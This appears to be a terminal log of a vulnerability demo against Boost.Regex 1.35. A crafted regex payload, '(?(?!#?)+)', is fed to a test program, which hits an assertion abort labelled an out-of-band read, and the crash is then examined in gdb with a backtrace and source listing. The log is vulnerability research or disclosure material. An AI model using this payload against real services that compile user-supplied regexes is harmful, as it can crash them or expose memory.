: user@vapor|0; pwd
/demos/boost
: user@vapor|0; source ../demos.sh
: demo@vapor|0; handle_product
00. NULL Dereference
01. Out of band read+
select vulnerability: 1
Out of band read+ selected.
payload: (?(?!#?)+)
press enter to run.

[1] 4506
tester: /usr/local/encap/boost-1198084281/include/boost-1_35/boost/regex/v4/perl_matcher_non_recursive.hpp:376: bool boost::re_detail::perl_matcher::match_startmark() [with BidiIterator = const char*, Allocator = std::allocator >, traits = boost::regex_traits >]: Assertion `pstate->type == syntax_element_startmark' failed.
../demos.sh: line 80: 4508 Aborted (core dumped) ./tester <<(echo "$payload")
[1]+ Exit 134 ( eval $cmd )
Core file generated.
Opening gdb ...
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

warning: Can't read pathname for load map: Input/output error.
Reading symbols from /usr/local/encap/boost-1198084281/lib/libboost_regex-gcc40-d-1_35.so.1.35.0...done.
Loaded symbols for /usr/local/encap/boost-1198084281/lib/libboost_regex-gcc40-d-1_35.so.1.35.0
Reading symbols from /usr/lib/libstdc++.so.6...done.
Loaded symbols for /usr/lib/libstdc++.so.6
Reading symbols from /lib/tls/i686/cmov/libm.so.6...Reading symbols from /usr/lib/debug/lib/tls/i686/cmov/libm-2.3.6.so...done.
done.
Loaded symbols for /lib/tls/i686/cmov/libm.so.6
Reading symbols from /lib/libgcc_s.so.1...done.
Loaded symbols for /lib/libgcc_s.so.1
Reading symbols from /lib/tls/i686/cmov/libc.so.6...Reading symbols from /usr/lib/debug/lib/tls/i686/cmov/libc-2.3.6.so...done.
done.
Loaded symbols for /lib/tls/i686/cmov/libc.so.6
Reading symbols from /usr/lib/libicui18n.so.34...done.
Loaded symbols for /usr/lib/libicui18n.so.34
Reading symbols from /usr/lib/libicuuc.so.34...done.
Loaded symbols for /usr/lib/libicuuc.so.34
Reading symbols from /lib/ld-linux.so.2...Reading symbols from /usr/lib/debug/lib/ld-2.3.6.so...done.
done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /usr/lib/libicudata.so.34...
warning: Lowest section in /usr/lib/libicudata.so.34 is .hash at 4322d094
done.
Loaded symbols for /usr/lib/libicudata.so.34
Reading symbols from /lib/tls/i686/cmov/libpthread.so.0...Reading symbols from /usr/lib/debug/lib/tls/i686/cmov/libpthread-2.3.6.so...done.
done.
Loaded symbols for /lib/tls/i686/cmov/libpthread.so.0
Core was generated by `./tester'.
Program terminated with signal 6, Aborted.
#0 0xffffe402 in __kernel_vsyscall ()
>> bt
#0 0xffffe402 in __kernel_vsyscall ()
#1 0x43b3d9a1 in raise () from /lib/tls/i686/cmov/libc.so.6
#2 0x43b3f2b9 in abort () from /lib/tls/i686/cmov/libc.so.6
#3 0x43b36f51 in __assert_fail () from /lib/tls/i686/cmov/libc.so.6
#4 0x08058e9d in boost::re_detail::perl_matcher >, boost::regex_traits > >::match_startmark (this=0xffffb26c) at /usr/local/encap/boost-1198084281/include/boost-1_35/boost/regex/v4/perl_matcher_non_recursive.hpp:376
#5 0x080571f5 in boost::re_detail::perl_matcher >, boost::regex_traits > >::match_all_states (this=0xffffb26c) at /usr/local/encap/boost-1198084281/include/boost-1_35/boost/regex/v4/perl_matcher_non_recursive.hpp:161
#6 0x080573af in boost::re_detail::perl_matcher >, boost::regex_traits > >::match_prefix (this=0xffffb26c) at /usr/local/encap/boost-1198084281/include/boost-1_35/boost/regex/v4/perl_matcher_common.hpp:310
#7 0x080578aa in boost::re_detail::perl_matcher >, boost::regex_traits > >::find_restart_any (this=0xffffb26c) at /usr/local/encap/boost-1198084281/include/boost-1_35/boost/regex/v4/perl_matcher_common.hpp:786
#8 0x08056b34 in boost::re_detail::perl_matcher >, boost::regex_traits > >::find_imp (this=0xffffb26c) at /usr/local/encap/boost-1198084281/include/boost-1_35/boost/regex/v4/perl_matcher_common.hpp:287
#9 0xf7f98ccd in boost::re_detail::perl_matcher >, boost::regex_traits > >::find (this=0xffffb26c) at ./boost/regex/v4/perl_matcher_common.hpp:218
#10 0x08053c62 in boost::regex_search > > (first=0xffffb374 "(?(?!#?)+)", last=0xffffb37e "", e=@0xffffd374, flags=boost::regex_constants::match_default)
    at /usr/local/encap/boost-1198084281/include/boost-1_35/boost/regex/v4/regex_search.hpp:138
#11 0x08053d15 in boost::regex_search > > (str=0xffffb374 "(?(?!#?)+)", e=@0xffffd374, flags=boost::regex_constants::match_default) at /usr/local/encap/boost-1198084281/include/boost-1_35/boost/regex/v4/regex_search.hpp:148
#12 0x08050d9d in main (argc=0x1, argv=0xffffd414) at tester.cc:30
>> up 4
#4 0x08058e9d in boost::re_detail::perl_matcher >, boost::regex_traits > >::match_startmark (this=0xffffb26c) at /usr/local/encap/boost-1198084281/include/boost-1_35/boost/regex/v4/perl_matcher_non_recursive.hpp:376
376 BOOST_ASSERT(pstate->type == syntax_element_startmark);
>> p pstate->type
$1 = boost::re_detail::syntax_element_rep
>> p *pstate
$2 = {type = boost::re_detail::syntax_element_rep, next = {p = 0x805d584, i = 0x805d584}}
>> l
371          break;
372       }
373       else
374       {
375          // zero width assertion, have to match this recursively:
376          BOOST_ASSERT(pstate->type == syntax_element_startmark);
377          bool negated = static_cast(pstate)->index == -2;
378          BidiIterator saved_position = position;
379          const re_syntax_base* next_pstate = static_cast(pstate->next.p)->alt.p->next.p;
380          pstate = pstate->next.p->next.p;
>> l
381          bool r = match_all_states();
382          position = saved_position;
383          if(negated)
384             r = !r;
385          if(r)
386             pstate = next_pstate;
387          else
388             pstate = alt->alt.p;
389          break;
390       }
>> l
391       }
392    default:
393    {
394       BOOST_ASSERT(index > 0);
395       if((m_match_flags & match_nosubs) == 0)
396       {
397          push_matched_paren(index, (*m_presult)[index]);
398          m_presult->set_first(position, index);
399       }
400       pstate = pstate->next.p;
>> q
: demo@vapor|0; exit